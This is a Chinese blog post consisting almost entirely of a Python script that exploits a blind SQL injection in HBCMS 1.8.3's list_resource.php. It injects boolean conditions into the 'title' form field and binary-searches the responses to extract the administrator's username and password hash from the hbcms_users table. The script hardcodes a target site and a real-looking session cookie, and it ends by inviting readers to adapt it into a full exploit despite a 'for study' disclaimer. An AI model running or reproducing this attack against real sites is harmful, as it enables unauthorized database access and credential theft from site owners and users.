python 盲注 HBCMS 1.8.3 漏洞

参考文章:http://tunps.com/hbcms-list_resource-php-blind-sql-injection


根据文章所写,应该是需要cookie。做好准备工作,上传个图片。

代码采用二分法,类似于sqlmap的算法

#-*- coding: UTF-8 -*-
__author__ = 'Administrator'

import requests

def post_data(step,p,min,max):
    if step == 1:
        sql_code = "(select length(login_name) from hbcms_users where id=1)>"+str(p)
    if step == 2:
        sql_code = "(select length(login_pass) from hbcms_users where id=1)>"+str(p)
    if step == 3:
        sql_code = "(select mid(login_name,"+str(p)+",1) from hbcms_users where id=1) between char("+str(min)+") and char("+str(max)+")"
    if step == 4:
        sql_code = "(select mid(login_pass,"+str(p)+",1) from hbcms_users where id=1) between char("+str(min)+") and char("+str(max)+")"
    return sql_code

header = {  #Cookie需要自己修改
            "Cookie":"visited_page=5629-; bdshare_firstime=1422370057395; PHPSESSION=ep7nhkn8poei9jbckd68j2arr1; HBcmsLogin=19d2c1427b496606c40cdfa0f7139327dca4962953fb8ea0fda93c3b87635c12lbc555; HBcmsLoginName=lbc555; HBcmsLoginID=1122; Hm_lvt_f9fcde02679434efdea208afff286914=1422370057,1422410160; Hm_lpvt_f9fcde02679434efdea208afff286914=1422410945; AJSTAT_ok_pages=28; AJSTAT_ok_times=1; Hm_lvt_a3afd03fd164ca89566a02f9c9db5dad=1422370057,1422410160; Hm_lpvt_a3afd03fd164ca89566a02f9c9db5dad=1422410945"
}
name_len = 1
pass_len = 32
name_con = ""
pass_con = ""
for step in range(1,5):
    if step == 1 or step == 2:
        p = 20
        min = 0
        max = 40
        while(1):
            #print str(max)+":"+str(min)
            if p == 40:
                print "Too long! Fuck you!"
                break
            payload = {
                "show_top_part=":"yes",
                "pageID":"1",
                "category_id":"all",
                "file_type":"0",
                "title":"q%\" and "+ post_data(step,p,0,0) +" and \"%a%\"=\"%a",
                "btnSubmit":"提交"
            }
            r = requests.post('http://hackblog.cn/user/list_resource.php',data=payload,headers=header) #修改目标url
            if "1309_1122_150128100612.gif" in r.content: #修改你上传后的图片名
                min = p
                p = int(round((float(max) - float(min))/2)) + min
                if max - min == 1:
                    if step == 1:
                        name_len = p
                        print "username length is "+str(name_len)
                        break
                    if step == 2:
                        pass_len = p
                        print "password length is "+str(pass_len)
                        break
            else:
                max = p
                p = int(round((float(max) - float(min))/2)) + min
                if max - min == 1:
                    if step == 1:
                        name_len = p
                        print "username length is "+str(name_len)
                        break
                    if step == 2:
                        pass_len = p
                        print "password length is "+str(pass_len)
                        break

    if step == 3 or step == 4:
        if step == 3:
            end = name_len
        else:
            end = pass_len
        for k in range(1,end+1):
            p = 47
            min = 32
            max = 126
            while(1):
                #print str(max)+":"+str(min)+":"+str(p)
                payload = {
                    "show_top_part=":"yes",
                    "pageID":"1",
                    "category_id":"all",
                    "file_type":"0",
                    "title":"q%\" and "+ post_data(step,k,p,max) +" and \"%a%\"=\"%a",
                    "btnSubmit":"提交"
                }
                r = requests.post('http://hackblog.cn/user/list_resource.php',data=payload,headers=header)#修改目标url
                if "1309_1122_150128100612.gif" in r.content: #修改你上传后的图片名
                    if max - min == 2:
                        if step == 3:
                            name_con = name_con + chr(p)
                            print "username is "+name_con
                        else:
                            pass_con = pass_con + chr(p)
                            print "password is "+pass_con
                        break
                    if max - min == 1:
                        max = max + 1
                    min = p
                    p = int(round((float(max) - float(min))/2)) + min

                else:
                    if max - min == 1:
                        min = min - 1
                    max = p
                    p = int(round((float(max) - float(min))/2)) + min

仅作记录学习,想写成exp的自行修改。


本文由Hack Blog原创,如需转载注明原文链接

作者:落 分类:Python 浏览:1966 评论:0
留言列表
发表评论
来宾的头像